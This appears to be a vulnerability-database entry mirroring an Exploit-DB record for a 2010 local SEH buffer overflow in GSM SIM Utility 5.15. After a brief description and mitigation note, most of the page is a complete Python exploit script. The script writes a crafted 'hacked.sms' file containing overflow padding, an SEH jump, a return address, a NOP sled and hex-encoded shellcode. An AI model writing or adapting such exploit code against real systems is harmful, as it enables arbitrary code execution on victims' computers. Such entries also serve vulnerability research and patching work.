GSM SIM Utility sms file Local SEH BoF

vendor:

GSM SIM Utility

by:

chap0

7,8

CVSS

HIGH

SEH

119

CWE

Product Name: GSM SIM Utility

Affected Version From: 5.15

Affected Version To: 5.15

Patch Exists: YES

Related CWE: N/A

CPE: a:gsm_sim_utility:gsm_sim_utility

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2010

GSM SIM Utility sms file Local SEH BoF

A buffer overflow vulnerability exists in GSM SIM Utility 5.15, which allows an attacker to execute arbitrary code by sending a specially crafted SMS file. The vulnerability is due to a lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can exploit this vulnerability by sending a specially crafted SMS file to the vulnerable application, which can result in arbitrary code execution.

Mitigation:

Upgrade to the latest version of GSM SIM Utility.

Source

Exploit-DB raw data:

# Exploit Title : GSM SIM Utility sms file Local SEH BoF
# Date          : June 28, 2010
# Author        : chap0 [www.seek-truth.net]
# Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-18508_4-10396246.html?tag=mncol 
# Version       : 5.15
# OS            : Windows XP SP3
# Type of vuln  : SEH
# Greetz to     : Corelan Security Team * Special Greetz to Lincoln
# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-054
# The Crew	: http://www.corelan.be:8800/index.php/security/corelan-team-members/
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#
# Code:
import time
 
print	  "|------------------------------------------------------------------|" 
print     "|                         __               __                      |" 
print     "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |" 
print     "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |" 
print     "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |" 
print     "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |" 
print     "|                                                                  |"     
print     "|-------------------------------------------------[ EIP Hunters ]--|" 
print	    "[+] GSM SIM Utility SEH Local Exploit\n"

	

sc =("d9eb9bd97424f431d2b27a31c964"
"8b71308b760c8b761c8b46088b7e"
"208b36384f1875f35901d1ffe160"
"8b6c24248b453c8b54057801ea8b"
"4a188b5a2001ebe337498b348b01"
"ee31ff31c0fcac84c0740ac1cf0d"
"01c7e9f1ffffff3b7c242875de8b"
"5a2401eb668b0c4b8b5a1c01eb8b"
"048b01e88944241c61c3b20829d4"
"89e589c2688e4e0eec52e89cffff"
"ff894504bb7ed8e273871c2452e8"
"8bffffff894508686c6c20ff6833"
"322e646875736572885c240a89e6"
"56ff550489c250bba8a24dbc871c"
"2452e85effffff68703058206820"
"6368616864204279686f69746568"
"4578706c31db885c241289e3686b"
"58202068426c6163687468652068"
"75676820685468726f31c9884c24"
"1189e131d252535152ffd031c050"
"ff5508")

buf= "A" * 1834 
buf+= "eb069090"
buf+= "F25E4300"    
buf+= "90" * 20
buf+= sc
 
try:
   crash = open("hacked.sms",'w')
   crash.write(buf)
   crash.close()
   print "[+] Visit www.corelan.be port 8800!\n" 
except:
   print "Error occured, look at the code!\n"
time.sleep(2)

print  "[+] Exploit file created!\n"